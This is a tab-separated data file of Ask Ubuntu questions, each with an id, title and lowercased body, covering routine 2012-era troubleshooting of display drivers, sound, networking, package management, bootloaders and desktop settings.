150825	installing nvidia driver ?	i have ubuntu 12.04 running on my laptop . i 've been trying to install a 2nd monitor on it , but ubuntu does not detect the second monitor . i have an nvidia card on my laptop , and ubuntu was using the nvidia driver . so after reading a few articles on this site , one suggestion made was that the nvidia driver could be the problem and suggested not using them . so i removed them and rebooted my computer . well , it looks like a bad idea ? well , i turned on my computer , and i did see both screens display a login prompt and both screens looked fine . then , shortly after , i see mostly black on the 2nd monitor , and a blocky purple background on my laptop monitor . i basically ca n't use my laptop , because i ca n't see anything . so , how do i get myself out of this ? like , how can i restore my nvidia driver , when i do n't even know what 's going on in my screen ? thanks !
150828	when are nvidia drivers updated ?	how often are nvidia-current and nvidia-current-updates packages updated , and when do they usually become available ?
150833	awesome starts programms twice	i 'm running ubuntu on a macbook and use an external monitor . so i use xrandr to turn off the laptop monitor on startup if the external monitor is connected with this small ruby script : # ! /usr/bin/ruby display = `xrandr -q | grep dp-1`.to_s if ! display.include ? `` disconnected '' then `xrandr -- output lvds-1 -- off` `xrandr -- output dp-1 -- mode 1920x1080` sleep 3 end i use the rc.lua to star the script and a few other programms in awesome : ... awful.util.spawn_with_shell ( `` /home/jo/.config/awesome/setdisplay.rb '' ) awful.util.spawn_with_shell ( `` nm-applet '' ) awful.util.spawn_with_shell ( `` dropbox start '' ) awful.util.spawn_with_shell ( `` setxkbmap de '' ) awful.util.spawn_with_shell ( `` thunderbird '' ) awful.util.spawn_with_shell ( `` google-chrome '' ) awful.util.spawn_with_shell ( `` pidgin '' ) ... the monitor script works nicely but unfortunately a few of the programms are started twice such as google-chrome and nm-applet . i think that all of the programms are started twice but that the other programms such as dropbox , thunderbird and so only allow one instance . i think so because thunderbird complains about another running instance . is it possible that there are two instances of awesome each starting the progamms and then when the laptop monitor is deactiveted the programms are moved to the external monitor 's awesome instance ? any ideas how to avoid that ?
150835	how to make that closing the lid hibernate the system even if there 's a secondary monitor connected ?	i enjoy my ubuntu laptop and the automatic hibernate on lid closing . unfortunately the hibernation does n't take place when closing the lid while an external monitor is plugged in . the monitor is only switched off ( doesnât received signal any more ) but the laptop is still running : when opening it back , it 's instantaneously available .
150839	is there some way to get a more usable file chooser dialog ?	on other operating systems the file chooser dialog in applications lets you do things like : see a larger preview of images in the current directory create a new folder change the view of the current directory between vertical list , horizontal list , small icons , large icons , thumbnails etc i am in ubuntu 12.04lts ( unity ) ... as far as i can tell there is no way to do any of these things . my file choosers look like this one i found on google images : ... except that i do n't get the list-detail view , i get horizontal rows of icons . i had a google and found this : http : //brainstorm.ubuntu.com/idea/240/ ( and hundreds of duplicate requests for the same functionality ) so apparently this have been fixed since v8 ? how do i get it to work ?
150841	weird screen settings on docking station	when i set my lenovo x220 tablet onto the docking station where a 1920x1200 screen is attached via display port - > dvi , both the internal and the external screen show the greatest common resolution which is 1024x768 . i can then set the display settings within kde , but that is rather time consuming . is there a way to set up the displays correctly when the notebook is in the docking station ? os can i write a shell script that sets the displays correctly ?
150844	how to really hide terminal output ?	i know that to launch an application and still keep working on the terminal , & is put in the end of command ( like emacs & ) but some commands still keep printing on the terminal , like this so how to really keep the command quiet on the terminal ?
150849	nvidia-settings not able to save my configuration	( this is a continuation of thread : installing nvidia driver ? ) . i am able to detect and configure an external monitor using nvidia-settings program . however , when i try to save my configuration , nvidia-settings complains that it ca n't save to xorg.conf . it states that : `` default device '' must have a driver line . now , i ran nvidia-settings using sudo , so this is n't a permissions problem . here 's my file ( i am typing it by hand , since my ubuntu laptop has all sorts of config errors , created by my overconfident self . : ) section `` device '' identifier `` default device '' option `` nologo '' `` true '' endsection do i just add a driver line ? and what should it look like ? thanks .
150851	how do i select a default sound card with alsa ?	i wish to select a default sound card , or disable all others , in order to have the correct one selected after suspend .
150854	how do i get security updates for restricted/partner packages ?	i want to perform just security updates on ubuntu 12.04 lts , keeping the rest of the system unchanged . i need to do this from the command line , no the gui update manager . i have implemented the solution described here , which seems to work great for this purpose . i merely substituted 'precise ' for 'lucid ' given that i am on 12.04 . my question is : by using apt pinning as described in that answer , will i still receive security updates for packages distributed through the `` other '' repositories - partner , restricted , multiverse , etc ? or will it only get me updates for the packages in the `` core '' distribution ? thanks ! ~l
150856	how do i install boot manager ?	how can i install boot-manager to ubuntu 12.04 ? i have tried sudo apt-get install boot-manager but it does not work . why i want is because i will close some startup application in order to optimize system performance . edit : error : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package boot-manager
150860	evolution slow when sending mail or switching between components	i 'm fighting with evolution . basically it 's working fine -- but it is very slow to react in certain situations . helper questions could it be that changing away from bonobo has to do with slowing-down ? there might be some trouble with the new engine and `` asynchronous actions '' . what to do about it ? are there e.g . any configuration files ? i want to get the previous `` working mood '' back . how can i speed this thing up ? different scenarios when sending a mail , the composer window hangs there inactive for a couple of seconds , everything grayed out ( the bigger the message/attachments , the longer it takes ) . though there is a green check mark saying it 's sent , i 'm not sure a ) why it 's still blocking everything and b ) whether i could simply close it without `` breaking '' / '' losing '' anything . in earlier versions , the composer window was closing pretty fast , and one could see the message being stored into the local `` outbox '' until it was sent , and one could immediately continue with the next task . i prefer that behaviour over the current , where i can not do anything in the application until the window closes . switching between modules . coming from mail and switching to the address book takes a couple of seconds . same for switching to the calendar . i read about different `` possible causes '' and tried a few things : i only have 3 local address books , so no networking should be involved here . to make sure , i switched to offline mode and then tried to access the address book . no noticeable difference . i use 3 google calendars . switching to offline mode made a minor difference , but so minor that it also could be `` imagination '' since one might have expected this in this case according to some reports , disabling the tasks should help . well , it did n't in my case , as i do n't use them regularly ( just two local items stored here ) maybe i should also mention that i 'm using the kde4 desktop ( so no unity or gnome , though both is installed on the computer ) . and i did not have this issue before i updated to 12.04 .
150864	skype 4.0 still looks like 2.2 beta	i 've just installed skype 4.0 for my ubuntu 12.4lts and the font and setup of it still looks like the older ersion 2.2 beta . i 've tryed reinstalling it , and rebooting my computer but it does n't help . i know that it 's suppose to look differently according to screenshots of other people using it .
150870	guide to customizing ubuntu vm	i am running a ubuntu ( 12.04 ) vm using vm player . my question is a two parter . 1 ) is it possible for me to customize the vm so that i only get a terminal and gui support . ( will sometimes use nautilus , firefox or chrome , and some tkinter built apps ) 2 ) can anyone reccomend a guide for doing this ? i 've been using ubuntu for about 2 years and am pretty comfortable with it . thanks in advance .
150873	python-tk package is not recognized ?	i 've got a small program i 've written in python ( 2.7.3 ) that i 'm moving over to another box . however , when executing this line : from tkinter import * i get this error ; traceback ( most recent call last ) : file `` < stdin > '' , line 1 , in < module > file `` /usr/lib/python2.7/lib-tk/tkinter.py '' , line 42 , in < module > raise importerror , str ( msg ) + ' , please install the python-tk package' importerror : /usr/lib/libtk8.5.so.0 : invalid elf header , please install the python-tk package however , it looks to me that python-tk is installed . python-tk is already the newest version . any advice or help would be appreciated .
150874	graphics driver problem , ati radeon hd 3200 , small screen size and slows everything down .	regards . i am using a : 2009 compaq presario cq40-415au notebook amd athlon x2 dual core processor 2.1 ghz 1024 mb l2 cache 3gb ddr2 ram ati radeon + hd 3200 graphics 256 mb , screen is 14 inch widescreen with resolution of 1280*800 . i installed ubuntu 12.04 lts 32bit on my laptop . it works brilliantly until i installed graphics driver . when i installed the driver , the graphics became slow . everything slowed down . even the splash screen resolution changed to something like 640*480 . i have liked ubuntu since 9.10 and for the freedom it provides and its versatility , but graphics problem remains the same . i even installed ubuntu on a 50 gb partition with 6 gb swap partition . my hdd is 320 gb . please tell me what is wrong .
150879	can i force vga signal output even when xrandr shows 'disconnected ' ?	my notebook is connected to a hdtv through a kvm switch ( one other notebook also connected to the same hdtv ) . the problem seems to be that ubuntu does n't recognize the hdtv to be turned on and therefore does n't enable the vga output . as far as i understand it has something to do with edid information not being send trough the kvm switch . xrandr wo n't enable the vga output through xrandr -- output vga1 -- auto , it just keeps showing as disconnected . can i somehow force the vga port to send a signal ? my graphics controller : intel corporation mobile 915gm/gms/910gml express graphics controller ( rev 03 )
150880	upgrade ubuntu cd	hello guys from ask ubuntu , i have a cd of ubuntu 11.04 and i started it the live cd , but it asks to upgrade to ubuntu 11.10 , i wonder if it will update my cd for ubuntu live cd without installing anything on my computer . thank you
150881	questions on loop devices and mounting a disk image	the commands are from here : mount disk ( device ) image about the first command ' i need to `` calculate the offset from the start of the image to the partition start '' , but do n't know what the numbers quoted in ** mean ( 512 in this example ) : $ sudo fdisk -lu sda.img ... units = sectors of 1 * **512** = **512** bytes sector size ( logical/physical ) : **512** bytes / **512** bytes ... device boot start end blocks id system sda.img1 * 56 6400000 3199972+ c w95 fat32 ( lba ) about the second command , what is the `` loop0 '' : sudo losetup -o 28672 /dev/loop0 sda.img i looked there and it looked like a text file but it is n't , it also not a folder . what is that file ? can i choose another name to it ? if yes , should i create it before ? how does the third command works ? what does every part in it mean ? : sudo mount /dev/loop0 /mnt i already successfully ran the commands to do what i wanted , it 's just important to me to understand it more for next time and for helping other . thanks for your answers and teaching me ( :
150884	how to find the ppa of a package found in launchpad ?	i am trying to install a program ( valgrind ) which needs libc6-dbg . on the other hand , i can not install libc6-dbg because : the following packages have unmet dependencies : libc6-dbg : depends : libc6 ( = 2.11.1-0ubuntu7 ) but 2.11.1-0ubuntu7.2 is to be installed e : broken packages which means i have a newer version of libc6 installed . however : sudo apt-get install libc6-dbg=2.11.1-0ubuntu7.2 does n't find anything . i am guessing i need to add the ppa containing that package , which is where i ran out of luck . i found the package i need here ( my ubuntu is lucid ) : https : //launchpad.net/ubuntu/lucid/i386/libc6-dbg/2.11.1-0ubuntu7.2 , however , i ca n't seem to figure out what i should do to get apt-get to see and install this package . help ?
150887	sound from both headphones and speakers	i guess this question already had the answer here but i ca n't find it . i 'm using 12.04 . update : the problem is that i can hear the sound from my laptop 's speakers even i plugged in my headphones . headphones is just standard stereo headphones . and the most interesting thing is that all was working just a week ago . i tried to play with pulseaudio and alsamixer settings - no results .
150900	unity quicklist for home is messed up	i ca n't change home folder quicklist options . everything i do , i continue to have : documents folder link pictures folder link music folder link downloads folder link ubuntu one folder link ubuntu one folder link ( as you can see , it 's a duplicate ) video folder link new window action separator home folder link ( bold ) separator unlock from launcher this is my ~/.local/share/applications/nautilus-home.desktop , that is exactly the same as /usr/share/applications/nautilus-home.desktop : [ desktop entry ] name=home folder comment=open your personal folder exec=nautilus % u icon=user-home terminal=false startupnotify=true type=application onlyshowin=gnome ; unity ; categories=gnome ; gtk ; core ; x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=nautilus x-gnome-bugzilla-component=general x-gnome-bugzilla-version=3.0.0 x-ubuntu-gettext-domain=nautilus actions=window ; [ desktop action window ] name=open a new window exec=nautilus onlyshowin=unity ;
150903	i changed my account from administrator to standard . how can i reverse this ?	i 'll begin by telling you that i am new to ubuntu and i am using ubuntu 11.10 . my problem is that i changed my account from administrator to standard . to be clear , i am the only user in the system . i am unable to use the sudo command or to install anything on the computer . when the system asks me for the password when installing anything , i found everything useless means non of my old password work .
150906	how to install old version of ffmpeg ?	i 'm having trouble with the current release of ffmpeg , it transcodes .mp3 to .wavs in a format that is unsupported by my client . how can install this version ? ffmpeg version 0.7.3-4:0.7.3-0ubuntu0.11.10.1 , copyright ( c ) 2000-2011 the libav developers built on jan 4 2012 16:08:51 with gcc 4.6.1 edit the problem i am trying to resolve is transcoding an .mp3 to .wav . our client has an identification service that determines a song from the .wav . when i pass the .wav that ffmpeg has generated exec ( `` ffmpeg -ss $ start -t $ duration -i $ shellargsongpath -f wav -ar 44100 somefile.wav '' ) ; i receive an `` audio format not supported '' my guess is that the default codec used to transcode from .mp3 to .wav has changed . would anyone happen to know what that was in the previous version ? edit ( reading database ... 31284 files and directories currently installed . ) preparing to replace ffmpeg 4:0.7.3-0ubuntu0.11.10.1 ( using ffmpeg_0.7.3-0ubuntu0.11.10.1_amd64.deb ) ... unpacking replacement ffmpeg ... replaced by files in installed package libav-tools ... dpkg : dependency problems prevent configuration of ffmpeg : ffmpeg depends on libavcodec53 ( < < 4:0.7.3-99 ) | libavcodec-extra-53 ( < < 4:0.7.3.99 ) ; however : version of libavcodec53 on system is 4:0.8.1-0ubuntu1 . package libavcodec-extra-53 is not installed . ffmpeg depends on libavdevice53 ( < < 4:0.7.3-99 ) | libavdevice-extra-53 ( < < 4:0.7.3.99 ) ; however : version of libavdevice53 on system is 4:0.8.1-0ubuntu1 . package libavdevice-extra-53 is not installed . ffmpeg depends on libavfilter2 ( < < 4:0.7.3-99 ) | libavfilter-extra-2 ( < < 4:0.7.3.99 ) ; however : version of libavfilter2 on system is 4:0.8.1-0ubuntu1 . package libavfilter-extra-2 is not installed . ffmpeg depends on libavformat53 ( < < 4:0.7.3-99 ) | libavformat-extra-53 ( < < 4:0.7.3.99 ) ; however : version of libavformat53 on system is 4:0.8.1-0ubuntu1 . package libavformat-extra-53 is not installed . ffmpeg depends on libavutil51 ( < < 4:0.7.3-99 ) | libavutil-extra-51 ( < < 4:0.7.3.99 ) ; however : version of libavutil51 on system is 4:0.8.1-0ubuntu1 . package libavutil-extra-51 is not installed . ffmpeg depends on libpostproc52 ( < < 4:0.7.3-99 ) | libpostproc-extra-52 ( < < 4:0.7.3.99 ) ; however : version of libpostproc52 on system is 4:0.8.1-0ubuntu1 . package libpostproc-extra-52 is not installed . ffmpeg depends on libswscale2 ( < < 4:0.7.3-99 ) | libswscale-extra-2 ( < < 4:0.7.3.99 ) ; however : version of libswscale2 on system is 4:0.8.1-0ubuntu1 . package libswscale-extra-2 is not installed . libav-tools ( 4:0.8.1-0ubuntu1 ) breaks ffmpeg ( < < 4:0.8~ ) and is installed . version of ffmpeg to be configured is 4:0.7.3-0ubuntu0.11.10.1 . dpkg : error processing ffmpeg ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... errors were encountered while processing : ffmpeg edit output when i run ffmpeg command from the server that produces the well-formed .wav ffmpeg version 0.7.3-4:0.7.3-0ubuntu0.11.10.1 , copyright ( c ) 2000-2011 the libav developers built on jan 4 2012 16:08:51 with gcc 4.6.1 configuration : -- extra-version='4:0.7.3-0ubuntu0.11.10.1 ' -- arch=amd64 -- prefix=/usr -- enable-vdpau -- enable-bzlib -- enable-libgsm -- enable-libschroedinger -- enable-libspeex -- enable-libtheora -- enable-libvorbis -- enable-pthreads -- enable-zlib -- enable-libvpx -- enable-runtime-cpudetect -- enable-vaapi -- enable-gpl -- enable-postproc -- enable-swscale -- enable-x11grab -- enable-libdc1394 -- enable-shared -- disable-static libavutil 51 . 7 . 0 / 51 . 7 . 0 libavcodec 53 . 6 . 0 / 53 . 6 . 0 libavformat 53 . 3 . 0 / 53 . 3 . 0 libavdevice 53 . 0 . 0 / 53 . 0 . 0 libavfilter 2 . 4 . 0 / 2 . 4 . 0 libswscale 2 . 0 . 0 / 2 . 0 . 0 libpostproc 52 . 0 . 0 / 52 . 0 . 0 hyper fast audio and video encoder usage : ffmpeg [ options ] [ [ infile options ] -i infile ] ... { [ outfile options ] outfile } ... use -h to get full help or , even better , run 'man ffmpeg' output from when i run ffmpeg command from server that produces ill-formed .wav ffmpeg version 0.8.1-4:0.8.1-0ubuntu1 , copyright ( c ) 2000-2011 the libav developers built on mar 22 2012 05:09:06 with gcc 4.6.3 this program is not developed anymore and is only provided for compatibility . use avconv instead ( see changelog for the list of incompatible changes ) . hyper fast audio and video encoder usage : ffmpeg [ options ] [ [ infile options ] -i infile ] ... { [ outfile options ] outfile } ... use -h to get full help or , even better , run 'man ffmpeg'
150909	plex wo n't enter my home directory or other partitions	i just installed the plex media server from the ubuntu software center , and opened the web interface . i wanted to start by adding a collection . when it gave me a file browser , i wanted to go to /home/robin/videos . /home is as far as i got . it showed robin , with an arrow in front of it , but when i tried to expand the directory tree it was empty . the same happened when trying to access /media/data . for me it 's quite useless like this , as all of my media files are inside those 2 directories . help would be much appreciated . my first guess seemed to be a correct one ; it is , as always , a permissions problem . how do i give plex access to my home folder without also giving other users access to it ? my home folder is encrypted by the way , so that 'll probably complicate things a little . robin @ robinj : ~ $ sudo -u plex bash [ sudo ] password for robin : bash : /home/robin/.bashrc : permission denied plex @ robinj : ~ $ ls -al ls : can not open directory . : permission denied plex @ robinj : ~ $ cd /home plex @ robinj : /home $ cd robin bash : cd : robin : permission denied plex @ robinj : /home $ ls -al robin ls : can not open directory robin : permission denied
150912	unable to move windows to second screen	hooked up a second screen to the second connector of my nvidia card , set it up with nvidia-settings and it started showing my background correctly . the x display works correctly ( i.e . display=:0.1 gedit works ) and the cursor goes from one screen to the other but i ca n't grab windows to the second screen and windows on the edge does n't appear half on one screen and half on the other . the second monitor does n't show in the monitor ubuntu settings dialog . i used to use the cube compiz effect , but i am not interested in it anymore . tried rebooting . any help appreciated , thanks very much .
150917	what terminal command checks the ubuntu version	what terminal command tells the version of ubuntu .
150923	swf editor/decompiler	i am searching for a good , and preferably free , swf editor and/or decompiler . i do not have access to the original flas . does anyone know of a program that would accomplish this ?
150928	save my emails in files	so as said in the title , i want to find a way download my emails on my pc and save them in a file . ( so then i could use linux text manipulation commands on them to do some filtering ) i'v found `` mutt '' a text-based e-mail client , and configured it to log into my gmail inbox . but first , it seems like it does n't get all my emails . and then , i did n't find a way to save the emails i get in a file . so if anyone knows any way of doing it , please make me know .
150929	no firmware found for broadcom wireless card ( bcm4318 ) on dell latitude d610	trying to get my 03:03.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) working . i just reformated and installed 12.04 on this old windows xp machine , and i do n't know where to get the firmware for this . this is what i got when i typed sudo lshw -c network : http : //pastebin.ubuntu.com/1041161/ also , when i go to additional drivers in the system settings , no proprietary drivers show up . any help i can get on this would be great , thanks !
150933	wireless connects but internet stops working on ubuntu 12.04 64 bit and broadcom 4313	i 'm running ubuntu 12.04 64 bit on a hp pavilion dm4 . it has a broadcom 4313 wireless adapter and a realtek rtl8168d/8111d ethernet adapter . i have n't been able to get consistent internet access from either the wireless or wired connection . on startup , or after restarting the router , i am able to load a couple of websites , but after that the internet stops working ( though the wirless/ethernet continue to indicate that they are connected ) . strangely , i am still able to do things with the websites i have already loaded - for example , loading/sending messages in gmail . it 's just loading certain new websites that is the issue . also , i still see available wireless networks . this the relevant output from lspci -v : 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 03 ) subsystem : hewlett-packard company device 1469 flags : bus master , fast devsel , latency 0 , irq 42 i/o ports at 2000 [ size=256 ] memory at c0404000 ( 64-bit , prefetchable ) [ size=4k ] memory at c0400000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : r8168 kernel modules : r8168 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) subsystem : hewlett-packard company device 145c flags : bus master , fast devsel , latency 0 , irq 17 memory at c2400000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : < access denied > kernel driver in use : wl kernel modules : wl , bcma , brcmsmac i 've tried blacklisting the different wireless drivers , but nothing seems to work , even if i try to force it to use the brcmsmac driver , which i 've read elsewhere should be the correct one . for the ethernet , i also tried installing the latest driver ( r8168 instead of r8169 ) and blacklisting the old one . i 'm dual booting windows 7 on the same laptop , but have no issues with either the wireless or ethernet connections .
150941	linux and windows kernel	i work on linux and a friend on a windows 7 . i was amazed about the speed that netbeans , eclipse , pgadmin and other programs open a lot , really , a lot faster on linux than on windows . what is the main difference between linux and windows kernel that causes that time load difference ? both machines have exactly the same hardware configuration .
150943	how to install ubuntu on an ( u ) efi device with existing gpt ?	i had ubuntu 11.04 running till now . now i want to reinstall ubuntu with nearly fresh 12.04 . i had much trouble last time to install ubuntu because of efi . yet somehow i somehow got it running . but i ca n't remember how . now i have a gpt partition with my personal data on sda4 , an efi partition on sda1 and between a swap and a root partition . i want to install ubuntu on the root partition without clearing the hole ssd . everytime i try to install ubuntu my `` bios '' ca n't find it . when i press the right key at the right time i get an overview over the possible booting options . there is a `` grub '' entry but when i enter it i get to the overview again after a redraw of the display . i tried all possibilities for the bootloader section ( yes i installed ubuntu 5 times today ) and have no clue how to get my system running again . i also tried repairing grub via chroot . what should i do ? edit : yes the installation completes without error . but as far as i can tell grub is n't even loaded . i would say my computer knows it should start grub , but ca n't excess the ssd . or it does n't find what it is looking for . and this behaviour did n't change by installing elilo ( though i ca n't tell if i did it right ) . grub is usually going to some shell when started with errors , but here simply nothing happens .
150948	wireless xbox 360 controller on humble bundle v	i got the humble indie bundle complete ( including bastion , lone survivor , braid and super meat boy ... the whole bundle is excellent ) . the fact is that braid , super meat boy , nor any game in the bundle , has xbox 360 wireless support ( it 's logical , but disappointing at the same time ) , nor any kind of gamepad support . i wanted to know if there is a solution for this conflict , having in mind that i am acctualy a newcomer ( i know how to use a terminal and apt-get , though ) and everything i 've read by now did n't gave me a concrete solution to my predicament . i tried using xboxdrv in sudo mode , and get the controller to be recognised and working correctly , but i can not bind the controllers pov , analog sticks or buttons . i also tried using joy2key , but it 's frustrating for me to configure . i wanted , also , to know if there exist any kind of gui or at least a guide to use joy2key and saving the templates and configurations for it .
150965	how to provide an application with full disk read/write permission ?	i have a problem concerning amnesia : the dark descent bought in humble indie bundle v. the game crashes when i hover over notes , and so does ubuntu . after the crash i can only see the desktop background , and the only way out is a restart . as i ca n't find anything concerning this particular problem , i try to follow the frictional games ' troubleshooting guide . in g-1 it says : make sure amnesia has full disk read/write permission in the directory it is installed . how do i do it ?
150966	ubuntu not showing on grub menu	i 've unchecked some wrong box in grub-customizer and now grub menu shows only windows . can i boot ubuntu using grub cli and resolve this because i do n't have ubuntu live cd.i 've even tried super grub disk but it shows `` bootmgr missing '' error.is there any other easier way to solve this problem which does n't involve ubuntu live cd .
150970	how can i change the application indicator label after delay ?	how can i change the application indicator label after delay self.ind = appindicator.indicator ( `` new-gmail-indicator '' , `` /usr/share/icons/ubuntu-mono-dark/status/16/ubuntuone-client-error.svg '' , appindicator.category_application_status ) self.ind.set_label ( `` ssh '' ) time.sleep ( 4 ) self.ind.set_label ( `` hss '' ) the application runs but i only see the hss label when running the application . i never see ssh .
150971	how do i convert only a portion of an mp3 file to wav at a certain frequency , from the command-line ?	this transcodes the entire .mp3 to a .wav mpg123 -w output.wav input.mp3 is there any way i can transcode a portion from the 10 second mark to the 20 second mark at a 44100hz ?
150972	connecting to wireless networks from command line	i need to write a shell script which connects to one of the two available wi-fi connections . one is a un secure connection and the other is secure connection . my question has 2 parts- how to connect to the un-secure ( un-encrypted and no password required ) connection from command line ( or by executing a shell script ) when i 'm connected to the secure connection ? i followed the steps in http : //www.ubuntugeek.com/how-to-troubleshoot-wireless-network-connection-in-ubuntu.html for in-secure connection . i put all the commands in a script and executed it ( i made sure that interface name and essid are correct ) sudo dhclient -r wlan0 sudo ifconfig wlan0 up sudo iwconfig wlan0 essid `` uapublic '' sudo iwconfig wlan0 mode managed sudo dhclient wlan0 but nothing happens : i 'm not disconnected from the current network and connected to the new one . when i want to connect to the secure wi-fi network , i understand from http : //askubuntu.com/a/138476/70665 that i need to use wpa_supplicant . but i enter a lot of details in the interface when i connect via ui security : wpa and wpa2 enterprise authentication : peap ca certificate : equifax ... peap version : automatic inner authentication : mschapv2 username : password : how to use wpa_supplicant to mention all these details in the command line ? the conf file network= { ssid= '' ssid_name '' psk= '' password '' } does n't work for me .
150973	ubuntu 12.04 froze , requiring powercycle . what should i look / grep for in the logs ?	this is not the first time that ubuntu has froze . last time , i checked 'recently updated files ' in /var/log/ and /var/crash/ and the cause of the problem appeared to be 'libreoffice ' . now , it has happened again . nothing works , except the power-down button ( based on previous experience ) . i ca n't even open tty 's using ctrl+alt+f { 1..6 } i have plenty of memory ( 7.7 gb ) , ram ( 2 x 3.16ghz ) and hard drive space ( 100 gb on a 256gb ssd ) . there is nothing i can do , except to shut down . the computer passed a memtest . what should i look ( grep ) for in the logs ? update : i have submitted a bug here : https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/1023916/
150975	want to install ubuntu 12.04 on powermac 11,2	want to install ubuntu 12.04 on apple powermac 11,2 ( g5 ) which has geforce 6600 le video what is the necessary text command to enter at boot prompt ? i have tried the regular and alternate cd iso's thank you in advance if you can help .
150977	why does n't the dash have an overlay scrollbar ?	i 'm running ubuntu 12.04 . the overlay scrollbar does n't appear in the dash when i hover over the scrollbar . it appears in other places .
150978	gedit problem cpp file is not created	when i open terminal i type mkdir name of folder cd name of folder when i write gedit x.cpp the cpp file is not created and the file does n't open to write the code any ideas why this happens ? i even added quotations after gedit but still the cpp file was not created .
150979	what should i do if i ca n't upgrade ubuntu ?	i tried to upgrade from ubuntu 11.10 to 12.04 lts , but it always went wrong . how could i do it right ?
150980	installation uninstallation shows error but works why ?	i get the following message when i remove or install a program but it installs or uninstalls correctly . please help me resolve it . package operation failed the installation or removal of a software package failed details installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 190360 files and directories currently installed . ) removing mahjongg ... processing triggers for man-db ... processing triggers for libglib2.0-0 ... processing triggers for hicolor-icon-theme ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... setting up linux-image-3.2.0-24-generic-pae ( 3.2.0-24.39 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae update-initramfs : generating /boot/initrd.img-3.2.0-24-generic-pae cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-24-generic-pae.postinst line 1010. dpkg : error processing linux-image-3.2.0-24-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-24-generic-pae ; however : package linux-image-3.2.0-24-generic-pae is not configured yet . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-image-generic-pae ( = 3.2.0.24.26 ) ; however : package linux-image-generic-pae is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-24-generic-pae linux-image-generic-pae linux-generic-pae error in function : setting up linux-image-3.2.0-24-generic-pae ( 3.2.0-24.39 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae update-initramfs : generating /boot/initrd.img-3.2.0-24-generic-pae cryptsetup : warning : failed to detect canonical device of overlayfs cryptsetup : warning : could not determine root device from /etc/fstab run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-24-generic-pae /boot/vmlinuz-3.2.0-24-generic-pae /usr/sbin/grub-probe : error : can not find a device for / ( is /dev mounted ? ) . run-parts : /etc/kernel/postinst.d/zz-update-grub exited with return code 1 failed to process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-24-generic-pae.postinst line 1010. dpkg : error processing linux-image-3.2.0-24-generic-pae ( -- configure ) : subprocess installed post-installation script returned error exit status 2 dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-24-generic-pae ; however : package linux-image-3.2.0-24-generic-pae is not configured yet . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae :
150990	how do i re-activate pulseaudio ? ( followed guide on skype.com )	i disabled pulseaudio to be able to use my microphone for skype , and now the volume controls do n't work , which i understand , is a common problem . i read that somebody fixed their skype microphone by going to system setting > multimedia > phonon > audio recording > prefer webcam microphone . i 'd like to try that , but i think i need to enable pulseaudio again . how do i do that ? i used the following guide on skype 's support pages to disable pulseaudio : can i change the sound system used by skype for linux ?
150991	settings schema 'gnome.org.desktop.a11y.magnifier ' does not contain a key named 'invert-lightness ' error when using gnome	i have just installed the gnome-shell on my ubuntu 12.04 . when i login i get this error : glib-gio-error : ** : settings schema 'gnome.org.desktop.a11y.magnifier' does not contain a key named 'invert-lightness' does anyone know how to fix this ? because of this error the gnome-shell does n't start at all ! when i installed it i followed these instructions : http : //www.filiwiese.com/installing-gnome-on-ubuntu-12-04-precise-pangolin/
